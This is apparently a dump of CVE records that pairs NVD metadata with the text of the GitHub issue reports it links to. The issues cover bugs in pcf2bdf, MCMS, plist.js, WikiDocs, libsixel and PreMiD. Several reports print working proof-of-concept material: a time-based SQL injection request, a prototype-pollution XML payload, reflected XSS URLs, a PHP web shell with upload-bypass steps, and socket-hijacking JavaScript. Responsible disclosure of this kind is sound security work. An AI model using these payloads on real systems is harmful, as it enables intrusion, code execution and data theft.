[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ganaware/pcf2bdf/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pcf2bdf_project:pcf2bdf:1.04:*:*:*:*:*:*:*", "matchCriteriaId": "3C056252-FB4B-49C8-875B-597EDC1257F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:pcf2bdf_project:pcf2bdf:1.05:*:*:*:*:*:*:*", "matchCriteriaId": "181D9F88-3AF3-40B9-8E91-A54B07C6C7CF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1284" ]
1284
https://github.com/ganaware/pcf2bdf/issues/5
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ganaware", "pcf2bdf" ]
Hello @ganaware, as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz-tested inputs with AFL. The file is partially parsed before the program crashes due to a segmentation fault. The actual input file is stored within the zipped folder attached. Input: `./pcf2bdf segfault_deadly_signal` Output: ``` ...... parsed content to stdout ...... ASAN:DEADLYSIGNAL ================================================================= ==5771==ERROR: AddressSanitizer: SEGV on unknown address 0x62400021edc8 (pc 0x000000405f16 bp 0x62400021edc8 sp 0x7ffc544ac210 T0) ==5771==The signal is caused by a READ memory access. #0 0x405f15 in main /home/ec2-user/pcf2bdf_research/pcf2bdf.cc:1190 #1 0x7fcf86916139 in __libc_start_main (/lib64/libc.so.6+0x21139) #2 0x409b49 in _start (/home/ec2-user/pcf2bdf_research/with_asan/pcf2bdf+0x409b49) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ec2-user/pcf2bdf_research/pcf2bdf.cc:1190 in main ==5771==ABORTING ``` [segfault_deadly_signal.zip](https://github.com/ganaware/pcf2bdf/files/7846647/segfault_deadly_signal.zip)
Segmentation fault - ASAN Deadly Signal in pcf2bdf
https://api.github.com/repos/ganaware/pcf2bdf/issues/5/comments
2
2022-01-11T12:45:15Z
2022-02-21T20:14:57Z
https://github.com/ganaware/pcf2bdf/issues/5
1,099,109,611
5
3,216
CVE-2021-44868
2022-02-17T16:15:07.770
A problem was found in ming-soft MCMS v5.1. There is a sql injection vulnerability in /ms/cms/content/list.do
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/58" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "A4C9F9B5-3712-483B-8744-058E61788907", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ming-soft/MCMS/issues/58
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ming-soft", "MCMS" ]
### Vulnerability file: /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java #Vulnerability tracking path: ``` 1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行 --The return value of call queryChildren() is tained 2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行 --Tainted value is returned 3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行 --The return value of call queryChildren() is tained 4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行 --Tainted value is assigned to variable columns 5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value enters call iterator() from the this argument, then taints the return value 6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value is assigned to variable column~iterator 7. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value enters call next() from the this argument, then taints the return value 8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value is assigned to variable column 9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行 --Tainted value enters call getId() from the this argument, then taints the return value 10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:52行 --Tainted variable this.id is returned 11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行 --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument 12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:148行 --Tainted value is assigned to variable this.categoryId 13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:183行 --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument 14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:77行 --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument 15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:253行 --categoryId ``` The risk of `SQLI` type is triggered, caused by the input parameter `categoryId`, value: ![image](https://user-images.githubusercontent.com/28668177/144779117-23137116-15b2-40da-995e-ac6ee65e593f.png) ### poc ``` POST /ms/cms/content/list.do HTTP/1.1 Host: cms.demo.mingsoft.net Content-Length: 21 Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://cms.demo.mingsoft.net Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: **** Connection: close contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||' ``` ![image](https://user-images.githubusercontent.com/28668177/144756596-ed4aa2a1-0f59-4e34-b11a-d78edd4e04e2.png) ![image](https://user-images.githubusercontent.com/28668177/144756806-8624d3df-78c5-46a4-bcad-120cfcc275f7.png) ![image](https://user-images.githubusercontent.com/28668177/144756834-e9863355-3b31-48ae-a2da-f0f69af68bef.png)
MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability
https://api.github.com/repos/ming-soft/MCMS/issues/58/comments
0
2021-12-05T17:24:31Z
2022-10-17T10:09:30Z
https://github.com/ming-soft/MCMS/issues/58
1,071,512,474
58
3,217
CVE-2022-22912
2022-02-17T19:15:08.120
Prototype pollution vulnerability via .parse() in Plist before v3.0.4 allows attackers to cause a Denial of Service (DoS) and may lead to remote code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/TooTallNate/plist.js/issues/114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/TooTallNate/plist.js/issues/114" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:plist_project:plist:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "ADC09244-E3D4-4E7E-807D-7017638CE736", "versionEndExcluding": "3.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/TooTallNate/plist.js/issues/114
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "TooTallNate", "plist.js" ]
Hi, There's a prototype pollution in .parse() related to the xml that are being parsed in it. In the following example the prototype pollution will affect the `length` parameter. ```javascript var plist = require('plist'); var xml = ` <plist version="1.0"> <key>metadata</key> <dict> <key>bundle-identifier</key> <string>com.company.app</string> </dict> </plist>`; console.log(plist.parse(xml)); /** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * END OF THE NORMAL CODE EXAMPLE! * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **/ /** * * * * * * * * * * * * * PROTOTYPE POLLUTION * * * * * * * * * * * * * **/ var xmlPollution = ` <plist version="1.0"> <dict> <key>__proto__</key> <dict> <key>length</key> <string>polluted</string> </dict> </dict> </plist>`; console.log(plist.parse(xmlPollution).length); // polluted ``` * More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
Prototype Pollution using .parse()
https://api.github.com/repos/TooTallNate/plist.js/issues/114/comments
7
2022-01-06T05:41:28Z
2022-09-30T21:32:26Z
https://github.com/TooTallNate/plist.js/issues/114
1,094,987,879
114
3,218
CVE-2022-23375
2022-02-19T16:15:14.523
WikiDocs version 0.1.18 has an authenticated remote code execution vulnerability. An attacker can upload a malicious file using the image upload form through index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://demo.wikidocs.it/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Zavy86/WikiDocs" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Zavy86/WikiDocs/issues/28" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://wikidocs.it/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://demo.wikidocs.it/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Zavy86/WikiDocs" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Zavy86/WikiDocs/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://wikidocs.it/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wikidocs:wikidocs:0.1.18:*:*:*:*:*:*:*", "matchCriteriaId": "089CD7F3-905A-4050-A5BF-3BC1FBCBB92C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/Zavy86/WikiDocs/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Zavy86", "WikiDocs" ]
# CVE-2022-23376 / Multiple reflected XSS vulnerabilities on different pages. ## 1. (Template.inc.php) - Reflected XSS Injection First vulnerability in line 47: ![image](https://user-images.githubusercontent.com/64528432/154803087-0a3f5eaa-a220-419d-97d1-35dd7645f4f4.png) Second is in line 210: ![image](https://user-images.githubusercontent.com/64528432/154803125-f81e0691-1967-4235-9dbe-7a96d627be66.png) XSS directly using url: https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E ## 2. (Submit.php) - Reflected XSS Injection Vulnerability in line 31: ![image](https://user-images.githubusercontent.com/64528432/154803204-359ff3b3-6052-4315-adfb-0a0694c17bde.png) XSS directly using url: https://www.wikidocs.it/submit.php?act=%22});%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E ## 3. (Index.php) - Reflected Xss Injection: ![image](https://user-images.githubusercontent.com/64528432/154803385-67a38c6d-9d92-4e26-a38e-60c3bbbb3e8f.png) # CVE-2022-23375 / Authenticated remote code execution vulnerability ## (Index.php) - Image upload, Authenticated Remote Code Execution: first, log in to the website and click edit button on the right top: ![image](https://user-images.githubusercontent.com/64528432/154803413-6fe4e701-d62e-4e45-a4e6-c9b9b0a349b0.png) Before upload proccess, we have to create malicious payload image: ![image](https://user-images.githubusercontent.com/64528432/154803433-91ede2da-d22a-4b39-9f73-4fbab638587d.png) name: shell.php.png payload : ```php <?php echo system($_REQUEST['cmd']); ?> ``` After that, you have to click image button on top and upload image: ![image](https://user-images.githubusercontent.com/64528432/154803466-590bbc40-a87e-4660-a6d7-0bbddcf0e979.png) Select malicious file and click upload: ![image](https://user-images.githubusercontent.com/64528432/154803487-d664a16c-1502-4ec1-ade7-1d338bb04de5.png) In upload process, change file extension to the PHP in the POST request: ![image](https://user-images.githubusercontent.com/64528432/154803511-00773aa0-f436-436d-97ce-02f1f6979789.png) then the browser automatically sends another request to the malicious file: ![image](https://user-images.githubusercontent.com/64528432/154803527-1cf06d2f-f163-4e41-8bf2-b01a43f99979.png) Just browse it and try to execute some commands: ![image](https://user-images.githubusercontent.com/64528432/154803554-bd6a409d-4f6a-444c-a78a-f9bd758b291e.png) # Information Disclosure Vulnerability (I did not reserve CVE for this one) ## (Functions.inc.php) - Debug mode can be enabled: Vulnerable lines are between 15-18: ![image](https://user-images.githubusercontent.com/64528432/154803312-8436a971-5521-438d-a17f-21b9c0b7f612.png) You can get sensitive information using debug mode: ![image](https://user-images.githubusercontent.com/64528432/154803356-efad257d-f6ca-4a64-ad10-ab6c948e52de.png) I hope you wil close these vulnerabilities ASAP.
Multiple Vulnerabilities in WikiDocs 0.1.18
https://api.github.com/repos/Zavy86/WikiDocs/issues/28/comments
8
2022-02-19T13:50:49Z
2023-05-10T14:12:25Z
https://github.com/Zavy86/WikiDocs/issues/28
1,144,714,811
28
3,219
CVE-2021-46700
2022-02-19T19:15:10.960
In libsixel 1.8.6, sixel_encoder_output_without_macro (called from sixel_encoder_encode_frame in encoder.c) has a double free.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/158" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/saitoha/libsixel/issues/158
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Hi, I found a double free or corruption in the current master 6a5be8b, OS: ubuntu 18.04 kernel: 5.4.0-87-generic POC: [poc.zip](https://github.com/saitoha/libsixel/files/7492167/poc.zip) ![image](https://user-images.githubusercontent.com/23655229/140643369-d02accea-8d38-484c-b2d1-8788a6ff0dbf.png) - gdb ``` ───────────────────────────────────────────────────────────────────────── Registers ────────────────────────────────────────────────────────────────────────── RAX: 0x0 RBX: 0x7ffff7c1ab80 (0x00007ffff7c1ab80) RCX: 0x7ffff7c6218b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffd570 --> 0x0 RDI: 0x2 RBP: 0x7fffffffd8c0 --> 0x7ffff7e07b80 --> 0x0 RSP: 0x7fffffffd570 --> 0x0 RIP: 0x7ffff7c6218b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffd570 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffffd7e0 --> 0x0 R13: 0x10 R14: 0x7ffff7ffb000 --> 0x62756f6400001000 R15: 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) ──────────────────────────────────────────────────────────────────────────── Code ──────────────────────────────────────────────────────────────────────────── 0x7ffff7c6217f <__GI_raise+191>: mov edi,0x2 0x7ffff7c62184 <__GI_raise+196>: mov eax,0xe 0x7ffff7c62189 <__GI_raise+201>: syscall => 0x7ffff7c6218b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff7c62193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff7c6219c <__GI_raise+220>: jne 0x7ffff7c621c4 <__GI_raise+260> 0x7ffff7c6219e <__GI_raise+222>: mov eax,r8d 0x7ffff7c621a1 <__GI_raise+225>: add rsp,0x118 [rsp+0x108] : 0x7fffffffd678 --> 0x56e8b0c29e2fc000 ─────────────────────────────────────────────────────────────────────────── Stack ──────────────────────────────────────────────────────────────────────────── 0000| 0x7fffffffd570 --> 0x0 0008| 0x7fffffffd578 --> 0xffffff01 0016| 0x7fffffffd580 --> 0x2 0024| 0x7fffffffd588 --> 0x48b8e0 --> 0x48b860 --> 0x0 0032| 0x7fffffffd590 --> 0x48b8e4 --> 0x48301000000000 0040| 0x7fffffffd598 --> 0x1 0048| 0x7fffffffd5a0 --> 0x100000002 0056| 0x7fffffffd5a8 --> 0x48b930 --> 0x0 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Legend: code, data, rodata, heap, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7c41859 in __GI_abort () at abort.c:79 #2 0x00007ffff7cac3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7dd6285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff7cb447c in malloc_printerr (str=str@entry=0x7ffff7dd8670 "double free or corruption (out)") at malloc.c:5347 #4 0x00007ffff7cb6120 in _int_free (av=0x7ffff7e07b80 <main_arena>, p=0x4b3a70, have_lock=<optimized out>) at malloc.c:4314 #5 0x0000000000407f8a in sixel_encoder_output_without_macro (frame=<optimized out>, dither=0x48b600, output=<optimized out>, encoder=0x4832d0) at encoder.c:831 #6 sixel_encoder_encode_frame (encoder=0x4832d0, frame=<optimized out>, output=<optimized out>) at encoder.c:1056 #7 0x000000000041c22b in load_with_builtin (pchunk=<optimized out>, fstatic=<optimized out>, fuse_palette=0x1, reqcolors=<optimized out>, bgcolor=<optimized out>, loop_control=<optimized out>, fn_load=<optimized out>, context=<optimized out>) at loader.c:963 #8 sixel_helper_load_image_file (filename=<optimized out>, fstatic=<optimized out>, fuse_palette=0x1, reqcolors=<optimized out>, bgcolor=<optimized out>, loop_control=<optimized out>, fn_load=<optimized out>, finsecure=<optimized out>, cancel_flag=<optimized out>, context=<optimized out>, allocator=<optimized out>) at loader.c:1418 #9 0x00000000004066e5 in sixel_encoder_encode (encoder=0x4832d0, filename=0x7fffffffe662 "./out/crashes/id:000003,sig:06,src:001126,op:arg1,rep:2") at encoder.c:1743 #10 0x0000000000402f73 in main (argc=<optimized out>, argv=<optimized out>, argv@entry=0x7fffffffe318) at img2sixel.c:457 #11 0x00007ffff7c430b3 in __libc_start_main (main=0x4026a0 <main>, argc=0xb, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #12 0x00000000004025de in _start () gdb-peda$ ```
double free or corruption in encoder.c:831
https://api.github.com/repos/saitoha/libsixel/issues/158/comments
1
2021-11-07T11:26:43Z
2024-05-04T16:25:26Z
https://github.com/saitoha/libsixel/issues/158
1,046,721,863
158
3,220
CVE-2021-46701
2022-02-20T21:15:07.437
PreMiD 2.2.0 allows unintended access via the websocket transport. An attacker can receive events from a socket and emit events to a socket, potentially interfering with a victim's "now playing" status on Discord.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.7, "source": "cve@mitre.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/PreMiD/PreMiD/issues/790" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/PreMiD/PreMiD/pull/791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/PreMiD/PreMiD/issues/790" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/PreMiD/PreMiD/pull/791" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:premid:premid:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "2004F0AD-9CE4-4968-9ABE-A3A54B6CE4CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/PreMiD/PreMiD/issues/790
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "PreMiD", "PreMiD" ]
# Explanation Some time ago, there was fix for allowing only chrome extension to connect to server (PreMiD app), but I noticed that I can still access server by just selecting transport as `websocket`. It works on localhost and can be done on websites. It allows to receive and emit events to socket. Related to #501 ## Steps to reproduce - Go to https://ririxidev.github.io/index.html - Open Console - You should get two things from app: - Version - Discord User and PreMiD app should open file dialog to "select local presence" ## Code to access socket ```javascript const socket = io("ws://localhost:3020", { transports: ["websocket"] }); socket.on("connect", io => { console.log("Sending event getVersion"); socket.emit("getVersion"); console.log("Sending event selectLocalPresence"); socket.emit("selectLocalPresence"); }); socket.on("receiveVersion", version => { console.log(`App version: ${version}`); }); socket.on("discordUser", user => { console.log(`Discord user: ${user}`); }); ``` Tested on latest PreMiD app (2.2.0)
[Vulnerability] Server (socket.io) is possible to be accessed from socket.io client
https://api.github.com/repos/PreMiD/PreMiD/issues/790/comments
1
2021-12-17T21:25:29Z
2022-06-15T19:47:03Z
https://github.com/PreMiD/PreMiD/issues/790
1,083,625,693
790
3,221
CVE-2021-44568
2022-02-21T18:15:08.553
Two heap-overflow vulnerabilities exist in openSUSE/libsolv libsolv through 13 Dec 2020 in the decisionmap variable via the resolve_dependencies function at src/solver.c (line 1940 & line 1995), which could cause a remote Denial of Service.
